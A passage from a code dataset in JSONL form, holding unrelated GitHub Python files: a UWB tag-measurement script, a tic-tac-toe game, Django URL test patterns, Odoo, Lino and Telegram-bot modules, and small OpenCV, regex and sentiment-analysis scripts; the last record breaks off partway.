elif tagNum == 1:\n useTag = tagNames[0]\n\n # Gracefully close the TCP socket\n tcpSock.close()\n\n # Receive data from the UDP stream \n udpSock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_DGRAM) # UDP\n udpSock.bind((UDP_IP, UDP_PORT))\n\n\n # Now get the tag measurements by opening a UDP socket\n j = 0\n while j <=2:\n\n circBuff = np.zeros((ancNum, buffSize, 3))\n counter = 0\n anchorCnt = np.zeros(ancNum)\n anchorCnt2 = 0\n \n\n if j == 0:\n input(\"\\nPress Enter to continue to take the first measurement...\")\n elif j == 1:\n input(\"\\nPress Enter to continue to take the second measurement...\")\n elif j == 2:\n input(\"\\nPress Enter to continue to take the third measurement...\")\n\n # Initialize a useful counter which will count the number of outstanding measurements\n waitingFor = buffSize\n\n while any (circBuff[:, buffSize-1, j] == 0):\n \n #Receive data from the UDP stream\n data, addr = udpSock.recvfrom(4096) # buffer size is 1600 bytes \n \n try:\n data = data.decode(\"utf-8\").split()[0] \n except:\n print(data)\n sys.exit()\n \n doc = json.loads(data)\n\n\n # Check if we have Tag-Anchor Communications\n if ('mode' not in doc) and (doc['id'] == useTag):\n for meas in doc['meas']:\n if 'dist' in meas:\n \n # This is the current anchor\n currentAnc = meas['anchor']\n anchorPos = ancNames.index(currentAnc)\n circBuffPos = int(np.mod(anchorCnt[anchorPos], buffSize))\n circBuff[anchorPos, circBuffPos, j] = meas['dist']\n anchorCnt[anchorPos] += 1\n waitingFor = np.max(np.count_nonzero(circBuff[anchorPos, circBuffPos, j], axis=0))\n print('\\nWaiting for ' + str(waitingFor) + ' additional measurements')\n print(circBuff[:, :, j])\n print('\\n')\n print('\\nMeasurements have been recorded') \n tagMat[j, :] = np.mean(circBuff[:, :, j].T, axis=0)\n print('\\n')\n print(tagMat)\n\n throwAway = input(\"\\nTHROW AWAY DATA? Y/N\").lower()\n if throwAway == 'n':\n j+=1\n\n \n\n \n\n return tagMat, tagNames, tagNum\n","repo_name":"nsotiriou88/Python","sub_path":"Projects/autoSetup/tagFunc/tagFunc.py","file_name":"tagFunc.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39243394457","text":"__author__ = 'derog'\n\nimport fileinput\n\n\nclass Board():\n def __init__(self):\n # 0 empty, 1 first player, -1 second player\n self._board_values = [[0 for j in range(3)] for i in range(3)]\n self._is_game_not_ended = True\n self._number_of_moves = 0\n self.winner = 0\n\n def __str__(self):\n return str(self._board_values)\n\n def value(self, xposition, yposition):\n return self._board_values[xposition][yposition]\n\n def values(self):\n return self._board_values\n\n def load(self, values):\n self._board_values = values\n #We need to check that the loading is valid and also count the number of of moves\n remaining_moves=9\n for j in range(3):\n for i in range(3):\n if self.value(i, j) == 0:\n remaining_moves-=1\n self._number_of_moves=remaining_moves\n\n def is_game_notended(self):\n return self._is_game_not_ended\n\n def move(self, xposition, yposition, value):\n if xposition is None or yposition is None:\n raise ValueError(\"Didnt receive a valid position\")\n\n if self._board_values[xposition][yposition] == 0:\n self._board_values[xposition][yposition] = value\n self._number_of_moves += 1\n else:\n raise IndexError(\"Tryng to insert in an occupied position\")\n\n # First check if there are avaible slots to play in, since we have the number of moves this is easy\n if self.number_of_moves() == 9:\n self._is_game_not_ended = False\n #We need an extra check for this one\n\n # Now we will check if someone wins the game; we will search only for the player playing\n def win_check(position, value, vector=(0, 0)):\n # Check if the position is valid\n x = position[0]\n y = position[1]\n if x < 0 or y < 0 or x > 2 or y > 2:\n return 0\n else:\n if vector == (0, 0):\n #First time execution\n if self._board_values[x][y] == value:\n max_value = 0\n vector_list = [(1, 0), (0, 1), (1, 1), (1, -1)]\n for element in vector_list:\n #Reevaluates with all the displacements\n temp = 0\n temp = win_check((x + element[0], y + element[1]), value, element)\n temp += win_check((x - element[0], y - element[1]), value, (-element[0], -element[1]))\n if temp > max_value:\n max_value = temp\n return 1 + max_value\n else:\n raise ValueError(\"Function should be used if the first position/value is wrong\")\n else:\n #Recursive values\n if self._board_values[x][y] == value:\n return 1 + win_check((x + vector[0], y + vector[1]), value, vector)\n else:\n return 0\n\n if win_check((xposition, yposition), value) > 2:\n self._is_game_not_ended = False\n self.winner = value\n\n\n def number_of_moves(self):\n return self._number_of_moves\n\n def __call__(self, *args, **kwargs):\n self.move(args[0][0], args[0][1], args[1])\n\n def plot(self):\n text = '#=#=#=#'\n\n for i in range(3):\n text += '\\n'\n text += '|'\n for j in range(3):\n if self._board_values[i][j] == 0:\n text += ' '\n elif self._board_values[i][j] == 1:\n text += 'X'\n elif self._board_values[i][j] == -1:\n text += 'O'\n text += '|'\n text += '\\n#=#=#=#'\n\n print(text)\n\n def getBoardValues(self):\n return self._board_values\n\n def __bool__(self):\n return self.is_game_notended()\n\n def __len__(self):\n return self._numeer_of_moves\n\n def who_wins(self):\n return self.winner\n\n\nclass Player():\n def __init__(self, name=\"\", brain=None, human=False):\n self.name = name\n self._is_human = human\n self.comp_time = []\n if name == \"\" and brain != None:\n self.name = str(brain)\n if brain is not None:\n self.brain = brain\n\n def is_human(self):\n return self._is_human\n\n def has_brain(self):\n if self.is_human():\n print(\"Humans don't need brains\")\n return False\n else:\n if self.brain is not None:\n return True\n else:\n return False\n\n def getName(self):\n return self.name\n\n def get_average_time(self):\n return sum(self.comp_time) / len(self.comp_time)\n\n def move(self, board, lastmove, player):\n import time\n\n start = time.clock()\n if self.is_human():\n move = []\n move[0] = fileinput.input()\n move[1] = fileinput.input()\n self.comp_time.append((time.clock() - start))\n return move\n else:\n if self.has_brain():\n play = self.brain(board, lastmove, player)\n self.comp_time.append((time.clock() - start))\n return play\n else:\n print(\"If the player is not an human a brain needs to be loaded\")\n return None\n\n def LoadBrain(self, brain):\n self.brain = brain\n\n def __str__(self):\n return self.getName()\n\n\nclass Game():\n def __init__(self, player1, player2, turn=1):\n self.board = Board()\n self.player1 = player1\n self.player2 = player2\n self.turn = turn\n self._winner = 0\n self.lastmove = (None, None)\n\n def move(self):\n if self.turn == 1:\n self.lastmove = self.player1.move(self.board.getBoardValues(), self.lastmove, self.turn)\n else:\n self.lastmove = self.player2.move(self.board.getBoardValues(), self.lastmove, self.turn)\n\n self.board.move(self.lastmove[0], self.lastmove[1], self.turn)\n self.turn *= -1\n\n if not self.board.is_game_notended():\n self._winner = self.board.who_wins()\n\n\n def __bool__(self):\n return self.is_game_notended()\n\n def plot(self):\n print('Player1[X] is ' + self.player1.getName())\n print('Player2[O] is ' + self.player2.getName())\n self.board.plot()\n\n def __iter__(self):\n self.move()\n\n def is_game_notended(self):\n return self.board.is_game_notended()\n\n def number_of_moves(self):\n return self.board.number_of_moves()\n\n def __len__(self):\n self.number_of_moves()\n\n def winner(self):\n if self.is_game_notended():\n return \"No one won yet\"\n else:\n if self._winner == 1:\n return self.player1.getName()\n elif self._winner == 0:\n return \"Draw\"\n else:\n return self.player2.getName()\n\n def who_plays(self):\n if self.turn == 1:\n return self.player1.getName()\n else:\n return self.player2.getName()\n\n #TODO ","repo_name":"FermiBarlam/TicTacToeAI","sub_path":"TicTacToeGame.py","file_name":"TicTacToeGame.py","file_ext":"py","file_size_in_byte":7355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26528832384","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom copy import copy\n\nfrom django.conf.urls import include, url\nfrom django_js_reverse.tests.helper import is_django_ver_gte_2\nfrom django_js_reverse.views import urls_js\n\ntry:\n from django.urls import path\nexcept ImportError:\n pass\n\nif sys.version < '3':\n import codecs\n\n def u(x):\n return codecs.unicode_escape_decode(x)[0]\nelse:\n def u(x):\n return x\n\n\ndef dummy_view(*args, **kwargs):\n pass\n\n\napp_name = 'django_js_reverse'\n\nbasic_patterns = [\n url(r'^jsreverse/$', urls_js, name='js_reverse'),\n\n # test urls\n url(r'^test_no_url_args/$', dummy_view, name='test_no_url_args'),\n url(r'^test_one_url_args/(?P[-\\w]+)/$', dummy_view, name='test_one_url_args'),\n url(r'^test_two_url_args/(?P[-\\w]+)-(?P[-\\w]+)/$', dummy_view, name='test_two_url_args'),\n url(r'^test_optional_url_arg/(?:1_(?P[-\\w]+)-)?2_(?P[-\\w]+)/$', dummy_view,\n name='test_optional_url_arg'),\n url(r'^test_unicode_url_name/$', dummy_view, name=u('test_unicode_url_name')),\n url(r'^test_duplicate_name/(?P[-\\w]+)/$', dummy_view, name='test_duplicate_name'),\n url(r'^test_duplicate_name/(?P[-\\w]+)-(?P[-\\w]+)/$', dummy_view, name='test_duplicate_name'),\n url(r'^test_duplicate_argcount/(?P[-\\w]+)?-(?P[-\\w]+)?/$', dummy_view,\n name='test_duplicate_argcount'),\n]\n\nif is_django_ver_gte_2():\n basic_patterns.append(\n path('test_django_gte_2_path_syntax///', dummy_view,\n name='test_django_gte_2_path_syntax'),\n )\n\nurlpatterns = copy(basic_patterns)\n\n# test exclude namespaces urls\nurlexclude = [\n url(r'^test_exclude_namespace/$', dummy_view,\n name='test_exclude_namespace_url1')\n]\n\n# test namespace\npattern_ns_1 = [\n url(r'', include(basic_patterns))\n]\n\npattern_ns_2 = [\n url(r'', include(basic_patterns))\n]\n\npattern_ns_arg = [\n url(r'', include(basic_patterns))\n]\n\nif is_django_ver_gte_2():\n urlexclude = (urlexclude, 'django_js_reverse')\n pattern_ns_1_arg = (pattern_ns_1, 'django_js_reverse')\n pattern_ns_2_arg = (pattern_ns_2, 'django_js_reverse')\n pattern_ns_arg_arg = (pattern_ns_arg, 'django_js_reverse')\nelse:\n urlexclude = urlexclude\n pattern_ns_1_arg = pattern_ns_1\n pattern_ns_2_arg = pattern_ns_2\n pattern_ns_arg_arg = pattern_ns_arg\n\npattern_nested_ns = [\n url(r'^ns1/', include(pattern_ns_1_arg, namespace='ns1'))\n]\n\npattern_dubble_nested2_ns = [\n url(r'^ns1/', include(pattern_ns_1_arg, namespace='ns1'))]\n\nif is_django_ver_gte_2():\n pattern_nested_ns_arg = (pattern_nested_ns, 'django_js_reverse')\n pattern_dubble_nested2_ns_arg = (pattern_dubble_nested2_ns, 'django_js_reverse')\nelse:\n pattern_nested_ns_arg = pattern_nested_ns\n pattern_dubble_nested2_ns_arg = pattern_dubble_nested2_ns\n\npattern_dubble_nested_ns = [\n url(r'^ns1/', include(pattern_ns_1_arg, namespace='ns1')),\n url(r'^nsdn2/', include(pattern_dubble_nested2_ns_arg, namespace='nsdn2'))]\n\nif is_django_ver_gte_2():\n pattern_dubble_nested_ns_arg = (pattern_dubble_nested_ns, 'django_js_reverse')\nelse:\n pattern_dubble_nested_ns_arg = pattern_dubble_nested_ns\n\npattern_only_nested_ns = [\n url(r'^ns1/', include(pattern_ns_1)),\n url(r'^nsdn0/', include(pattern_dubble_nested2_ns_arg, namespace='nsdn0'))]\n\nif is_django_ver_gte_2():\n pattern_only_nested_ns_arg = (pattern_only_nested_ns, 'django_js_reverse')\nelse:\n pattern_only_nested_ns_arg = pattern_only_nested_ns\n\nurlpatterns += [\n url(r'^ns1/', include(pattern_ns_1_arg, namespace='ns1')),\n url(r'^ns2/', include(pattern_ns_2_arg, namespace='ns2')),\n url(r'^ns_ex/', include(urlexclude, namespace='exclude_namespace')),\n url(r'^ns(?P[^/]*)/', include(pattern_ns_arg_arg, namespace='ns_arg')),\n url(r'^nestedns/', include(pattern_nested_ns_arg, namespace='nestedns')),\n url(r'^nsdn/', include(pattern_dubble_nested_ns_arg, namespace='nsdn')),\n url(r'^nsno/', include(pattern_only_nested_ns_arg, namespace='nsno'))\n]\n","repo_name":"pnija/debian-installer","sub_path":"debian/kolibri/usr/lib/python3/dist-packages/kolibri/dist/django_js_reverse/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73720833767","text":"from lino.utils import isidentifier\n\nfrom lino.api import dd, _, pgettext\n\n\nclass MessageType(dd.Choice):\n #required_roles = set({})\n\n def __init__(self, value, text, **kwargs):\n if not isidentifier(value):\n raise Exception(\"{} not a valid identifier\".format(value))\n super(MessageType, self).__init__(value, text, value, **kwargs)\n\n # def add_requirements(self, *args):\n # \"\"\"\n # Add the specified user roles as requirements to this message type.\n # \"\"\"\n # self.required_roles |= set(args)\n\nclass MessageTypes(dd.ChoiceList):\n verbose_name = _(\"Message Type\")\n verbose_name_plural = _(\"Message Types\")\n item_class = MessageType\n\n # @classmethod\n # def register_type(cls, name, *args, **kwargs):\n # cls.add_item_lazy(name, *args, **kwargs)\n\n\nadd = MessageTypes.add_item\nadd('system', _(\"System event\"))\nadd('change', pgettext(\"message type\", \"Change\"))\n# add('300', _(\"Action\"), 'action')\n# add('300', _(\"Warning\"), 'warning')\n# add('400', _(\"Note\"), 'note')\n# add('900', _(\"Notification\"), 'notification')\n\n\n\nclass MailModes(dd.ChoiceList):\n verbose_name = _(\"Notification mode\")\n verbose_name_plural = _(\"Notification modes\")\n\nadd = MailModes.add_item\nadd('silent', _(\"Silent\"), 'silent')\nadd('never', _(\"No mails\"), 'never')\n# add('immediately', _(\"Immediately\"), 'immediately') # obsolete\nadd('often', _(\"Mail often\"), 'often')\nadd('daily', _(\"Daily email digest\"), 'daily')\nadd('weekly', _(\"Weekly email digest\"), 'weekly') # not yet implemented\n","repo_name":"lino-framework/lino","sub_path":"lino/modlib/notify/choicelists.py","file_name":"choicelists.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"71315501928","text":"import cv2 as cv\n\n# in this program we are writting some text on image.\n# putText(1st_arg, 2nd_arg, 3rd_arg, 4th_arg, 5th_arg, 6th_arg, 7th_arg) method is used to put text on image \n# 1st_arg: it displays the output image after putting text.\n# 2nd_arg: text that you want to put on image.\n# 3rd_arg: position where on image you want to put that text.\n# 4th_arg: what font style you want to put.\n# 5th_arg: size of the font.\n# 6th_arg: color in RGB tuple.\n# 7th_arg: thickness of the font (only integer values).\n\nimage = cv.imread(\"lena.jpg\")\n\ntext_image = cv.putText(image, \"Girl\", (0, 50), cv.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 0), 3)\ncv.imshow(\"Texted image\", text_image)\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"Amrat26728/opencv","sub_path":"display-text-on-image.py","file_name":"display-text-on-image.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19945140819","text":"import textblob \nfrom textblob import TextBlob\nfrom article_preprocessing import tokenize_hin, spacy_tokenizer, remove_hin_stopwords\nimport numpy as np\nfrom gensim.models.fasttext import FastText \nfrom model import get_sentiment, get_word_polarity, get_word_polarity_en\nfrom sentiment_config import *\n\nfilepath = HINDI_STOPWORDS\n\n# used to find the location points of aspect term in the review\n# takes tokenized aspect term and article as input \ndef aspect_term_location(aspect_term, article, lang_code):\n location_points = []\n start_point = article.index(aspect_term[0])\n location_points.append(start_point)\n if len(aspect_term) > 1:\n end_point = article.index(aspect_term[len(aspect_term)-1])\n location_points.append(end_point)\n \n return location_points \n\n# Used to find the aspect term sentiment, for a sentence in the review \n# takes the aspect term, sentence and language code as the input\n# pass pos_words and neg_words dictionaty list along with the FastText embeddings model when using Indian languages\n# pass the respective model and word lists for a given language.\n# The aspect term and sentence need to be tokenized \ndef word_distance_based_score(aspect_term, article, lang_code, model=None):\n\taspect_locations = aspect_term_location(aspect_term, article, lang_code)\n\n\tif len(aspect_locations) == 1:\n\t\tstart_point = end_point = aspect_locations[0]\n\telse:\n\t\tstart_point = aspect_locations[0]\n\t\tend_point = aspect_locations[1]\n\n\tprint(start_point)\n\tprint(end_point)\n\n\ttot_polarity_start = 0\n\ttot_polarity_end = 0 \n\n\tfor i in range(start_point):\n\t\tif lang_code == 'en':\n\t\t\tpolarity = get_word_polarity_en(article[i])\n\t\tif lang_code =='hi':\n\t\t\tpolarity = get_word_polarity(article[i],lang_code, model)\n\t\tdistance = i \n\t\ttot_polarity_start = tot_polarity_start + polarity*(distance/start_point)\n\n\tprint(tot_polarity_start)\n\n\tend_dist = len(article) - 1 \n\tfor i in range(end_point+1, len(article)):\n\t\tif lang_code == 'en':\n\t\t\tpolarity = get_word_polarity_en(article[i])\n\t\tif lang_code == 'hi':\n\t\t\tpolarity = get_word_polarity(article[i], lang_code, model)\n\t\tdistance = end_dist - i\n\t\ttot_polarity_end = tot_polarity_end + (distance/end_dist)*polarity\n\n\tprint(tot_polarity_end)\n\n\ttot_polarity = tot_polarity_start + tot_polarity_end\n\treturn tot_polarity\n\n\t\n# Function is used to find the final polarity of the aspect term in an article\n# Takes the aspect term, sentences and the language code as input\n# pass pos_words and neg_words dictionaty list along with the FastText embeddings model when using Indian languages\n# pass the respective model and word lists for a given language.\n# the aspect term should be tokenized \n# the sentences mean that a whole article should be broken down into sentences using the sentence\n# segmentation \ndef aspect_polarity(aspect_term, sentences, lang_code, model=None):\n if lang_code == 'en':\n sentences = [spacy_tokenizer(i) for i in sentences]\n if lang_code == 'hi':\n sentences = [tokenize_hin(i) for i in sentences]\n sentences = [remove_hin_stopwords(i, filepath) for i in sentences]\n print(sentences)\n tot_polarity = 0\n for review in sentences:\n try:\n polarity = word_distance_based_score(aspect_term, review, lang_code, model=model )\n tot_polarity = tot_polarity + polarity\n except ValueError: # for handling sentences which don't have aspect term in the article \n tot_polarity = tot_polarity + 0 \n \n if tot_polarity > 0: \n aspect_polarity = 1\n elif tot_polarity == 0:\n aspect_polarity = 0\n else:\n aspect_polarity = -1 \n\n return aspect_polarity ","repo_name":"AchintyaX/ABSA_Indic","sub_path":"ABSA_Rule_Based.py","file_name":"ABSA_Rule_Based.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28550598774","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, fields, exceptions, api, _\nimport openerp.addons.decimal_precision as dp\n\n\nclass PurchaseCostDistribution(models.Model):\n _inherit = \"purchase.cost.distribution\"\n \n cost_lines = fields.One2many(readonly=True, states={'draft': [('readonly', False)], 'calculated': [('readonly', False)]})\n benefit_margin = fields.Float (string = 'Margin %', readonly=True,\n states = {'draft': [('readonly', False)], 'calculated': [('readonly', False)]}, default = -1,\n help = \"If the margin is less than 0, it does not apply\")\n\n @api.multi\n def action_calculate (self):\n super (PurchaseCostDistribution, self).action_calculate ()\n for distribution in self:\n for line in distribution.cost_lines:\n if line.benefit_margin >= 0:\n if self.env.ref('distribution_price_margin.group_margin_calculation_type') in self.env['res.users'].browse([self._uid]).groups_id:\n line.benefit_price = line.standard_price_new / (1 - (line.benefit_margin / 100))\n else:\n line.benefit_price = line.standard_price_new + (line.standard_price_new * (line.benefit_margin / 100))\n else:\n line.benefit_price = 0\n return True\n \n @api.multi\n def set_margin (self):\n for distribution in self:\n for line in distribution.cost_lines:\n line.benefit_margin = distribution.benefit_margin\n \n @api.one\n def action_done(self):\n for line in self.cost_lines:\n if line.benefit_price > 0:\n line.product_id.lst_price = line.benefit_price\n super (PurchaseCostDistribution, self).action_done ()\n \nclass PurchaseCostDistributionLine(models.Model):\n _inherit = \"purchase.cost.distribution.line\"\n \n state = fields.Selection (readonly = True, related = \"distribution.state\")\n benefit_margin = fields.Float (string = 'Margin %', readonly = False, default = -1)\n benefit_price = fields.Float (string = 'Sale Price', help = _(\"If the value is 0 or negative, the sale price is not changed\"))\n old_sale_price = fields.Float (related=\"product_id.lst_price\", readonly = True)\n \n @api.onchange('benefit_price')\n def onchange_benefit_price(self):\n if self.benefit_price >= 0:\n try:\n if self.env.ref('distribution_price_margin.group_margin_calculation_type') in self.env[\n 'res.users'].browse([self._uid]).groups_id:\n self.benefit_margin = (1 - (self.standard_price_new / self.benefit_price)) * 100\n else:\n self.benefit_margin = ((self.benefit_price - self.standard_price_new) / self.standard_price_new) * 100\n except:\n self.benefit_margin = -1\n else:\n self.benefit_margin = -1\n \n @api.onchange('benefit_margin')\n def onchange_benefit_margin(self):\n if self.benefit_margin >= 0:\n try:\n if self.env.ref('distribution_price_margin.group_margin_calculation_type') in self.env[\n 'res.users'].browse([self._uid]).groups_id:\n self.benefit_price = self.standard_price_new / (1 - (self.benefit_margin / 100))\n else:\n self.benefit_price = self.standard_price_new + (self.standard_price_new * (self.benefit_margin / 100))\n except:\n self.benefit_price = 0\n else:\n self.benefit_price = 0\n\n","repo_name":"dtorresxp/land_cost12","sub_path":"distribution_price_margin/models/purchase_cost_distribution.py","file_name":"purchase_cost_distribution.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40240997205","text":"from sqlalchemy import Column, String\nfrom TelethonHell.DB import BASE, SESSION\n\n\nclass Sudo(BASE):\n __tablename__ = \"sudo\"\n chat_id = Column(String(14), primary_key=True)\n\n def __init__(self, chat_id):\n self.chat_id = chat_id\n\n\nSudo.__table__.create(checkfirst=True)\n\n\ndef in_sudo(chat_id):\n try:\n return SESSION.query(Sudo).filter(Sudo.chat_id == str(chat_id)).one()\n except BaseException:\n return None\n finally:\n SESSION.close()\n\n\ndef add_sudo(chat_id):\n adder = Sudo(str(chat_id))\n SESSION.add(adder)\n SESSION.commit()\n\n\ndef rem_sudo(chat_id):\n rem = SESSION.query(Sudo).get(str(chat_id))\n if rem:\n SESSION.delete(rem)\n SESSION.commit()\n\n\ndef all_sudo():\n rem = SESSION.query(Sudo).all()\n SESSION.close()\n if rem:\n return rem\n else:\n return 1234\n","repo_name":"The-HellBot/Plugins-T","sub_path":"TelethonHell/DB/sudo_sql.py","file_name":"sudo_sql.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"31317255697","text":"import re\n\nif __name__ == '__main__':\n regex = re.compile(\"^[+-]?\\d*(\\.{1}\\d{1,})$\")\n\n T = int(input())\n for i in range(T):\n s = input()\n if regex.match(s):\n print(True)\n else:\n print(False)","repo_name":"andrewupk/HackerRank","sub_path":"Python/RegexAndParsing/FloatingPoint.py","file_name":"FloatingPoint.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38688307624","text":"from data.lexer import Lexer\nimport os\n\nos.system('cls')\n\ndef main():\n lexer = Lexer()\n\n with open('data/test.py', 'r', encoding='utf-8') as file:\n data = file.read()\n file.close()\n \n lexer.set_data(data)\n\n token_list = [i for i in lexer.lexerGenerator()]\n\n print(data)\n print(token_list)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TagCopperLight/OneLine-Compiler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11278945423","text":"\"\"\"Module contains classes Enemy, Player\"\"\"\n\nfrom random import randint\nfrom settings import PLAYER_LIVES, ALLOWED_ATTACK, PlayerMove\nfrom exception import GameOver, EnemyDown\n\n\n\nclass Enemy:\n \"\"\"Class Enemy\"\"\"\n\n def __init__(self, level):\n \"\"\"Constructor accepts argument: level\"\"\"\n self.level = level\n self.lives = self.level\n\n @staticmethod\n def select_attack():\n \"\"\"Method returns a random number\"\"\"\n return randint(1, 3)\n\n def decrease_lives(self):\n \"\"\"Method changes the number of opponent's lives and raises an exception EnemyDown\"\"\"\n self.lives -= 1\n if self.lives == 0:\n raise EnemyDown\n\n\nclass Player:\n \"\"\"Class Player\"\"\"\n\n def __init__(self, name):\n \"\"\"Constructor accepts argument: name\"\"\"\n self.name = name\n self.lives = PLAYER_LIVES\n self.score = 0\n self.allowed_attacks = ALLOWED_ATTACK\n\n @staticmethod\n def fight(attack, defense):\n \"\"\"Method returns the result of the attack/defense\"\"\"\n if attack == defense:\n return 0\n elif (attack == 1 and defense == 2) or \\\n (attack == 2 and defense == 3) or \\\n (attack == 3 and defense == 1):\n return 1\n else:\n return -1\n\n\n def decrease_lives(self):\n \"\"\"Method changes the number of opponent's lives and raises an exception GameOver\"\"\"\n self.lives -= 1\n if self.lives == 0:\n raise GameOver(self.name, self.score)\n\n def attack(self, enemy_obj):\n \"\"\"Method receives data from the console and calls the method fight\"\"\"\n attack = int(input('Make a choice to move: Choice 1(rock), 2(paper) or 3(scissors):- '))\n defence = enemy_obj.select_attack()\n result = self.fight(attack, defence)\n if result == 0:\n print(\"it's Draw\")\n print(\"__________________________\")\n elif result == 1:\n print(\"You attacked successfully!\")\n print(\"__________________________\")\n self.score += 1\n enemy_obj.decrease_lives()\n elif result == -1:\n print(\"You missed!\")\n print(\"__________________________\")\n print(f\"Your score:\", self.score)\n print(f\"Your life:\", self.lives)\n\n def defence(self, enemy_obj):\n \"\"\"Method receives data from the console and calls the method fight\"\"\"\n defence = int(input('Make a choice to move: Choice 1(rock), 2(paper) or 3(scissors):- '))\n attack = enemy_obj.select_attack()\n result = self.fight(attack, defence)\n if result == 0:\n print(\"it's Draw\")\n print(\"____________________________\")\n elif result == 1:\n print(\"Enemy attacked successfully!\")\n print(\"____________________________\")\n self.decrease_lives()\n elif result == -1:\n print(\"You missed!!\")\n print(\"____________________________\")\n\n","repo_name":"Stebeniev/First_game","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16536238387","text":"from calidadaguas import CSVWriter, NayadeScraping\n\n# We don't know the number of beaches, we have to bruteforce it.\nfor i in range(1, 1979):\n # Get the beach info.\n scraping = NayadeScraping.NayadeScraping()\n scraping.scrap(i)\n\nwriter = CSVWriter.CSVWriter()\nwriter.dump_data(scraping.beaches)\n","repo_name":"openkratio/calidad-aguas","sub_path":"old/calidad-aguas.py","file_name":"calidad-aguas.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"167843933","text":"class Solution:\n def rotate(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n temp = copy.deepcopy(matrix[::-1])\n a = len(matrix)\n b = len(matrix[0])\n \n for i in range(a):\n for j in range(b):\n matrix[j][i] = temp[i][j]\n # matrix = zip(*matrix[::-1])\n \n \n \n","repo_name":"MingfeiPan/leetcode","sub_path":"array/48.py","file_name":"48.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39818938835","text":"import itertools\n\ntriangle = []\nsquare = []\npentagonal =[]\nhexagonal = []\nheptagonal = []\noctagonal = []\nn = 1\ntri = 0\n\nwhile tri < 10000:\n \n tri = int(n*(n+1)/2)\n if 1000 < tri < 10000:\n triangle.append(tri)\n \n sq = n**2\n if 1000 < sq < 10000: \n square.append(sq)\n \n pen = int(n*(3*n-1)/2)\n if 1000 < pen < 10000:\n pentagonal.append(pen)\n \n hexa = int(n*(2*n-1))\n if 1000 < hexa < 10000:\n hexagonal.append(hexa)\n \n hep = int(n*(5*n-3)/2)\n if 1000 < hep < 10000:\n heptagonal.append(hep)\n \n octa = int(n*(3*n-2))\n if 1000 < octa < 10000:\n octagonal.append(octa)\n n += 1\n \norderings = list(itertools.permutations([square, pentagonal, hexagonal, heptagonal, octagonal], 5))\n\ndef main():\n for i in range(len(orderings)):\n v,w,x,y,z = orderings[i]\n \n for tri in triangle:\n for sq in v:\n if str(tri)[2:] == str(sq)[:2]:\n for pen in w:\n if str(sq)[2:] == str(pen)[:2]:\n for hexa in x:\n if str(pen)[2:] == str(hexa)[:2]:\n for hep in y:\n if str(hexa)[2:] == str(hep)[:2]:\n for octa in z:\n if str(hep)[2:] == str(octa)[:2] and str(octa)[2:] == str(tri)[:2]:\n print(tri,sq,pen,hexa,hep,octa)\n return tri + sq + pen + hexa + hep + octa\n \nans = main()","repo_name":"jgrou/ProjectEuler","sub_path":"CyclicalFigurateNumbers.py","file_name":"CyclicalFigurateNumbers.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19625652166","text":"from rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom django_filters import FilterSet, OrderingFilter\n\nfrom users.models import User\nfrom users.serializers import UserSerializer\n\n\nclass UserFilter(FilterSet):\n order = OrderingFilter(\n fields=(\n ('created_at', 'created_at'),\n ('username', 'username'),\n ),\n )\n\n class Meta:\n model = User\n fields = {\n 'username': ('icontains',)\n }\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n filterset_class = UserFilter\n\n @action(detail=False, methods=['get'])\n def self(self, request):\n data = UserSerializer(request.user).data\n\n return Response(data)\n\n def get_permissions(self, *args, **kwargs):\n permission_classes = {\n 'self': (IsAuthenticated,),\n 'list': (IsAuthenticated,)\n }.get(self.action, ())\n\n return [permission() for permission in permission_classes]\n","repo_name":"grmoon/escrow","sub_path":"escrow/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74428497447","text":"from google.appengine.ext import ndb\nfrom my.models import QueDoidura\nimport json\nfrom google.appengine.api import namespace_manager\n\n\n# Opcional. 